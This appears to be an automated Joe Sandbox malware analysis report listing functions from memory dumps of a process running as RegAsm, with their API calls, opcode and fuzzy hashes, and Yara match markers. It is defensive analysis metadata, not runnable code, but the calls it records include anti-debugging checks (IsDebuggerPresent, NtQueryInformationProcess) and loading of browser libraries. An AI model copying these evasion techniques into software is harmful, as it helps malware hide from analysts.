Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
String ID:
API String ID: 1171715205-0
Opcode ID: 27718aa6c5af93e279fde1122b0d037b2aa14feba888cc6e3901784d582b19c5
Instruction ID: 92d8522fc1b7d6baf4ba3a4a88afa911d7fe1fee5f394e1277ca540313e3168e
Opcode Fuzzy Hash: 27718aa6c5af93e279fde1122b0d037b2aa14feba888cc6e3901784d582b19c5
Instruction Fuzzy Hash: 5C219370A06308ABEF209A71CD54BEF76FCAB4575CF148229E62096680E7749A88C761

Function 0041D016 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041D44E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D463
UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D46E
GetCurrentProcess.KERNEL32(C0000409), ref: 0041D48A
TerminateProcess.KERNEL32(00000000), ref: 0041D491

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
Instruction ID: db72b0d0349af5086fa5416fb06d4d65b4d62ee2eec0edc44458765686740910
Opcode Fuzzy Hash: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
Instruction Fuzzy Hash: 1921ABB4C01705DFD764DFA9F988A447BB4BF08316F10927AE41887262EBB4D9818F5E

Function 6C0F545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C0F8A4B

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: c7be6ee711b1d492d18a86cf9b8dceefd506e05dfc4e70c2d954b3ecf64df777
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 91B1D676A0121A8BDB14CE68CC91BDCB7F2EF95314F1802A9C959DB781D730A9C6CB90

Function 6C0F542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C0F88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C0F925C

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 18c2d5225abcbdfbb43b3c656354836be14a382ad7e56c34aa74a8873448dfe1
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 4DB1D576E0520A8BCB14CE58C8817EDB7F6EF95314F180269C959DB785D730A9CACB90

Function 6C0F50C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C0F8E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C0F925C

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: 6ca7a1cc21ff3edc15a2cf423e3528114df694967618dddbf69994169dad7d65
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: 93A1E676A001168BCB14CE68CC81BDDB7F6AF95314F1842B9C959EB785D730A9CACB90

Function 6C0D77A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0D7A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0D7A93

Part of subcall function 6C0A5C50: GetTickCount64.KERNEL32 ref: 6C0A5D40
Part of subcall function 6C0A5C50: EnterCriticalSection.KERNEL32(6C10F688), ref: 6C0A5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0D7AA1

Part of subcall function 6C0A5C50: __aulldiv.LIBCMT ref: 6C0A5DB4
Part of subcall function 6C0A5C50: LeaveCriticalSection.KERNEL32(6C10F688), ref: 6C0A5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C0D7B31

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: c4369519ec083b3183c8c1452c2c8158b4b3980e86a6ccc44d71d15de236b45a
Instruction ID: f40ded993a475a1fadcbc112aebb0c21440632ee4678dfaf19127c81b669f0e9
Opcode Fuzzy Hash: c4369519ec083b3183c8c1452c2c8158b4b3980e86a6ccc44d71d15de236b45a
Instruction Fuzzy Hash: ECB169357083818BCB14CF28C45079FB7E2BBC9318F564A1CE99567B95DB70F90A8B82

Function 00411E5D Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction ID: cc1f0cdc7ec9addca40c1236ae1a006933468a7893b1c2cc3d15f31d1535d567
Opcode Fuzzy Hash: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction Fuzzy Hash: 3F010C70500309BFDF158FA1DC849AB7BBAFF493A5B248459F90593220E7369E91EA24

Function 6C0EB700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,?,0000001C,6C0BFE3F), ref: 6C0EB720
RtlNtStatusToDosError.NTDLL ref: 6C0EB75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,00000000,?,?,00000000,?,6C0BFE3F), ref: 6C0EB760

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 7ec1d6bb1f59927d484d3e09f2cd1809a1ed176301604599e8d84fe85ec1cfc9
Instruction ID: 5ee0ad6c543f35a06d308675d5f91e15dae18f10e89c100f9fde6d282457f045
Opcode Fuzzy Hash: 7ec1d6bb1f59927d484d3e09f2cd1809a1ed176301604599e8d84fe85ec1cfc9
Instruction Fuzzy Hash: F8F0C870A4430CAEEF119AA2CC85BDF77FCAB08719F105229E621629C0D774A6DCC664

Function 6C0EB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0903D4,?), ref: 6C0EB955
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,0000001C), ref: 6C0EB9A5

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: be5fba91110b115aa02210a61b96bc1ff48d4ec47b229f626d32135e1d355535
Instruction ID: 76d4ba14e8c255dc4d534434b2e6e16776f1a6b08878b3020ae37258e77c1dcc
Opcode Fuzzy Hash: be5fba91110b115aa02210a61b96bc1ff48d4ec47b229f626d32135e1d355535
Instruction Fuzzy Hash: A341C031F002199FDF08CFA9D880BEEB7F6EF88314F14812AE905A7704DB31A9458B94

Function 0041C0E9 Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,759183C0,00000000,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C13E
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C14C

Part of subcall function 0041B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0041C211,?,?,?,?,?,?,?,?,?,?,0041C5B4), ref: 0041B942

Part of subcall function 0041B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041B923

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
Instruction ID: e9dd666d6f03e3bc2370fb34bb5a4ee32d8a7198e314cb59bed8413d438bc6b2
Opcode Fuzzy Hash: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
Instruction Fuzzy Hash: D421E6B19002099FCF44DF69D9806ED7BF5FF08300F1041BAE949EA21AE7398945DFA4

Function 0040145B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0040146D
NtQueryInformationProcess.NTDLL(00000000), ref: 00401474

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentInformationQuery
String ID:
API String ID: 3953534283-0
Opcode ID: 4ad97b2d1b6fe464e896af9ca2ec5f1d337a2bfbe60684343260282f6ee0994e
Instruction ID: b0d32a7bd978dbc9842abeebd7712166406d741a383243a14520f93e3bb00ea5
Opcode Fuzzy Hash: 4ad97b2d1b6fe464e896af9ca2ec5f1d337a2bfbe60684343260282f6ee0994e
Instruction Fuzzy Hash: 23E01271640304F7EF109BA0DD0AF5F72AC9700749F201175A606E60E0D6B8DA009A69

Function 0042B556 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 0042B56F

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
Instruction ID: a965a9a856964b19ccfd622dabb5ac07b34b26fd65f40016140b6e3a2338ef0b
Opcode Fuzzy Hash: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
Instruction Fuzzy Hash: 20D05E71B50700ABD7204F30AD497B177A0EB20B16F70994ADC92490C0D7B865D58649

Function 0042762E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000275EC), ref: 00427633

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
Instruction ID: 9d6a1cee47f635cf13ac9ce2c832d8e993c26a4a09d493c42fccfa592e4f4ed0
Opcode Fuzzy Hash: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
Instruction Fuzzy Hash: 109002A035E250578A0217716C1D50565946A48706B951561A001C4454DBA580409919

Function 0040111D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90

Function 00418599 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00

Function 0041859A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Function 0040148A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
